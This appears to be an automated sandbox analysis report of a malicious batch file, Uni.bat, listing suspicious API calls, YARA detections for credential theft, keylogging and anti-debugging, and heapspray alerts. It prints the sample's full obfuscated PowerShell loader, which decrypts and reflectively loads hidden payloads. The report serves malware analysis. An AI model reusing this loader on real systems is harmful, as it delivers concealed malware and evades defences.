NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 17, 2023, 5:29 p.m.	process_identifier: 2368 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 17, 2023, 5:29 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Communications over P2P network	rule	Network_P2P_Win
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Escalate priviledges	rule	Escalate_priviledges
description	File Downloader	rule	Network_Downloader
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Take ScreenShot	rule	ScreenShot

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function BgRxE($XUBfu){ $yHyZa=[System.Security.Cryptography.Aes]::Create(); $yHyZa.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yHyZa.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yHyZa.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7MymoDIuie4tPVsKnVHec+BUrxddCyMvAJR/EwsbVTs='); $yHyZa.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6Jj5qajjJfogZ5gJA2HV7Q=='); $Urbyf=$yHyZa.CreateDecryptor(); $return_var=$Urbyf.TransformFinalBlock($XUBfu, 0, $XUBfu.Length); $Urbyf.Dispose(); $yHyZa.Dispose(); $return_var;}function mliMM($XUBfu){ $vcQqJ=New-Object System.IO.MemoryStream(,$XUBfu); $OYxgY=New-Object System.IO.MemoryStream; $Pmwqm=New-Object System.IO.Compression.GZipStream($vcQqJ, [IO.Compression.CompressionMode]::Decompress); $Pmwqm.CopyTo($OYxgY); $Pmwqm.Dispose(); $vcQqJ.Dispose(); $OYxgY.Dispose(); $OYxgY.ToArray();}function WbAdc($XUBfu,$ghXXD){ $oXpAu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$XUBfu); $chWYo=$oXpAu.EntryPoint; $chWYo.Invoke($null, $ghXXD);}$EsBfp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\test22\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($yNUfS in $EsBfp) { if ($yNUfS.StartsWith(':: ')) { $xivcY=$yNUfS.Substring(3); break; }}$ofSbM=[string[]]$xivcY.Split('\');$UxsLS=mliMM (BgRxE ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ofSbM[0])));$IoyMQ=mliMM (BgRxE ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ofSbM[1])));WbAdc $IoyMQ (,[string[]] (''));WbAdc $UxsLS (,[string[]] (''));

A potential heapspray has been detected. 146 megabytes was sprayed onto the heap of the cmd.exe process (2 events)

count

1541

name

heapspray

process

cmd.exe

total_mb

length

57344

protection

PAGE_READWRITE

count

1073

name

heapspray

process

cmd.exe

total_mb

length

61440

protection

PAGE_READWRITE

Uni.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All